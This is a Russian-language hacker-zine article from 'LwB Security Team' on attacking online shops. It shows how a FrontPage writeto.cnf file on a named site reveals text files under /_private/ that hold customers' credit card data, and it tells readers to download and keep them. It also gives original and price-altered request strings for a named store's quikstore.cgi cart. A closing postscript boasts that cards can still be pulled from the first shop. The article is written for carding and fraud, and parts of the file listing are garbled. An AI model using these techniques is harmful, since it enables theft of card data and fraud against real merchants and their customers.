Разбираем дальше уязвимости систем электронной коммерции. Начнем со сладкого, а именно с сс. Незадачливым администраторам интернет-магазинов уже давно следовало бы понять, что файлам, хранящим критическую информацию (пароли, номера кредитных карт, и т.д.), совсем не место в открытых для всеобщего просмотра веб-директориях, даже если об этих файлах никто, кроме самого админа не знает. Примером такого головотяпства, является —www.swimmingcoach.org , администратор которого хранит данные о кредитных карточках своих клиентов в текстовых файлах директории /_private/, будучи уверенным в том, что о их существовании знает только он один. Так бы и было, если бы не всеми любимый Microsoft, со своим
величайшим творением всех времен и народов — FrontPage, который сыграл в этом случае злую шутку. Ее смысл в том, что в некоторых файлах FrontPage хранит информацию о всех файлах веб-сервера и, что самое главное, файлах, в которые выводятся и сохраняются результаты обработки данных. О дним из таких файлов является writeto.cnf, расположенный как правило в — http://www.xxx.org/_vti_pvt/writeto.cnf.
Вот какую информацию предоставляет скачанный writeto.cnf с сервера
www.swimmingcoach.org (именно скачанный, в браузере ты его не откроешь):
——
_private/sic7result.txt: collegesTiJimming/sicS.htm fpdb:global.asa
collegesTiJimming/sicS.asp salary.asp
_private/Jobsvc_net.txt:jobservice/job_net_questions.htm
_private/audio_sales.txt:worldclinic/ASCA99/asca99_audio.htm
_private/survey.txt:jobservice/salary.htm _private/Mc2000_registration. txt:
Tijorldclinic/asca2000/asca2000_packets . htm
_private/form_results.txt:jobservice/02salary.htm
_private/article_results.txt:ALTST/past_articles/altst_4.htm ALTST/past_artide;
pbsurvey.txt:water_depth_rule_questionnaire.asp
_private/cert_up.txt:forms/certupgrade.htm
_private/Mcreg2002_results.txt:worldclinic/ASCA2002/registration2.htm worldclin:
_private/emembers.txt:articles/9903/9903-4.htm articles/9903/9903-5.htm
article;j _private/jobsvc_net.txt:jobservice/job_net_questions.htm
_private/certificaion_orders.txt:ASCA_Catalog/certification_0rder.htm
_private/ameridome_leads.txt:ameridome/ordering.htm
_private/feedbackl.txt:forms/feedback.htm
_private/bkcatalog.txt:ASCA_Catalog/catalog.htm ASCA_Catalog/images/catalog.htm
_private/wc2000_Registration.txt: worldclinic/ ASCA2000/asca2000_packets.htm
_private/sicSresult.txt:sicS/default.htm
_private/sescc_reg.txt:forms/STiJscc_reg.htm
_private/chevron.txt:forms/chevform.htm
_private/sicord.txt:ASCA_Catalog/sicord.htm
_private/samonth.txt:forms/samonth.htm
_private/altst_jоin.txt:ALTST/ALTST_Join.htm learning_center:global.asa
SurvivalKIT:survivalkit.asp
——
Как ты видишь, результаты выводятся в текстовые файлы emembers.txt, survey.txt,
sicSresult.txt лежащие в директории /_private/. Остается всего лишь открыть их в
браузере и сохранить те, в которых лежат кредитки.
Кроме этого, ту же информацию можно получить и из другого файла на этом сервере
author.log, расположенного в директории /_vti_log/. Он большой, так что придется
запастись терпением.
Следующим сайтом который подвергнется нашему разбору, будет www.maledicta.com.
В одной из прошлых статей мы говорили о манипуляции ценой в торговых тележках.
www.maledicta.com дает нам еще один пример такого действия. Скрипт тележки
quikstore.cgi (в прошлом — бажный) в данном случае обрабатывает запросы методом
POST, так что для изменения цены товара придется воспользоваться утилитой
Achilles, скачать которую ты можешь с нашего сайта — lwb57.webmen.ru.
С ее помощью ты увидишь строку запроса вот такого вида:
——
item-BEQUGODU%7C14.95%7CEquinox+of+the+Gods%7CNA%7CNA=1&store_type=html&page=c[+]
[+]rowley.html&add_to_cart.x=45&add_to_cart.y=14
——
Конечно, если выберешь книгу Алистера Кроули (Сrowley), на мой взгляд,
единственного мистика, достойного прочтения.
Как ты, наверное, уже успел заметить, что цена товара передается в строке запроса
«14.95″, с помощью Achilles ты можешь теперь ее изменить и передать серверу.
А можешь просто передать запрос в строке браузера.
Так выглядит изначальный запрос:
—
http://www.maledicta.com/cgi-bin/quikstore…14.95%7CEquinox[+]
[+]+of+the+Gods%7CNA%7CNA=1&store_type=html&page=crowley.html&add_to_cart.x=45[+]
[+]&add_to_cart.y=14
—
А так модифицированный:
—
http://www.maledicta.com/cgi-bin/quikstore…0.95%7CEquinox+[+]
[+]of+the+Gods%7CNA%7CNA=1&store_type=html&page=crowley.html&add_to_cart.x=45&[+]
[+]add_to_cart.y=14
—
Приятных чтений на ночь;-).
Eat The Rich!
Copyright 2002-2004 by LwB Security Team. All rights reserved.
З,Ы, из первого шопа до сегодня можно креды дергать, привда без cvv2